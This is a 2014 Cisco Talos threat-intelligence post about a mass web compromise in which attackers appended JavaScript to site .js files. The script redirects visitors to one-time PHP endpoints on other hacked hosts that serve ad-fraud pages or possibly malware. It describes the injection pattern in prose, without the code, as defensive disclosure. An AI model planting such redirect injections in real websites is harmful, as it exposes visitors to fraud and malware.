Avatar

This post is co-authored with Levi Gundert and Andrew Tsonchev.

Update 2014-03-21: For clarity, the old kernel is a common indicator on the compromised hosts. We are still investigating the vulnerability, and do not yet know what the initial vector is, only that the compromised hosts are similarly ‘old’.

Update 2014-03-22: This post’s focus relates to a malicious redirection campaign driven by unauthorized access to thousands of websites. The observation of affected hosts running Linux kernel 2.6 is anecdotal and in no way reflects a universal condition among all of the compromised websites. Accordingly, we have adjusted the title for clarity. We have not identified the initial exploit vector for the stage zero URIs. It was not our intention to conflate our anecdotal observations with the technical facts provided in the listed URIs or other demonstrable data, and the below strike through annotations reflect that. We also want to thank the community for the timely feedback.

TRAC-tank-vertical_logo-300x243

TRAC has recently observed a large malicious web redirect campaign affecting hundreds of websites. Attackers compromised legitimate websites, inserting JavaScript that redirects visitors to other compromised websites. All of the affected web servers that we have examined use the Linux 2.6 kernel. Many of the affected servers are using Linux kernel versions first released in 2007 or earlier. It is possible that attackers have identified a vulnerability on the platform and have been able to take advantage of the fact that these are older systems that may not be continuously patched by administrators.

compromise_1

The attack itself happens in multiple stages. Attackers compromise an existing website, append a line of JavaScript to multiple .js files hosted on the site. This causes visitors to load and run a new JavaScript file served from a second compromised host. Utilising a two stage process allows attackers to serve up a variety of malicious content to the visitor. We observed the second stage sites serving what appears to be pay per view fraud pages, where the visitor’s browser loads multiple advertisements to generate revenue for the attacker. However, there is anecdotal evidence that visitors have been infected with Trojan malware as part of this final step.

The line appended to the .js files takes the form of:
compromise_2

Two comments containing a hexadecimal colour reference flank an instruction to the browser to download JavaScript from a PHP file on a second compromised website. The name of this PHP file always follows the same pattern: 8 mixed case alpha numeric characters with a parameter accepting an eight digit id value. The PHP file only responds once per ID value. If accessed more than once, the page returns a 403 forbidden error, otherwise malicious JavaScript is returned to be executed in the visitor’s browser.

Many of the affected hosts have been identified as compromised and cleaned.
compromise_3
An example response message from a cleaned tier one host.

AV products may detect the JavaScript redirect as being similar to that previously used in the Blackhole exploit kit. However, we have no evidence to suggest that this campaign is related to Blackhole rather than an example of code reuse. Indeed, this may be related to the Mesh Network identified by Sucuri.

The speed of spread of this attack has been dramatic, with almost 400 distinct hosts being affected each day on March 17 & 18.
compromise_day

At the time of writing, we have identified in excess of 2700 URLs that have been utilised in this attack. The attackers have subverted existing, legitimate websites to affect unsuspecting users. Security awareness campaigns that train users to be wary of unknown websites may not be effective against trusted websites that become compromised to serve malware. Although users of Cisco’s Cloud Web Security solution are protected from this attack, we observe that approximately 1 in 15 of our clients have had at least one user who has been intercepted attempting to request an affected URL.

The servers affected by the attack are distributed throughout the world, with a particularly high incidence in Germany and USA.
compromise_country

This large scale compromise of an aging operating system highlights the risks posed by leaving such systems in operation. Systems that are unmaintained or unsupported are no longer patched with security updates. When attackers discover a vulnerability in the system, they can exploit it at their whim without fear that it will be remedied. In April 2014, Windows XP will become unsupported. Organisations urgently need to review their use of unsupported systems in operation. Such systems need to be upgraded where possible, or regularly monitored to detect compromise. Organisations should consider their exposure to risks from the use of unsupported systems by partners and suppliers, in addition to the dangers of user interaction with such systems over the internet.

Large numbers of vulnerable unpatched systems on the internet are tempting targets for attackers. Such systems can be used as disposable one-shot platforms for launching attacks. This makes it all the more important that aging systems are properly maintained and protected.

Identified tier 0 and tier 1 affected web sites.



Authors

Martin Lee

EMEA Lead, Strategic Planning & Communications

Cisco Talos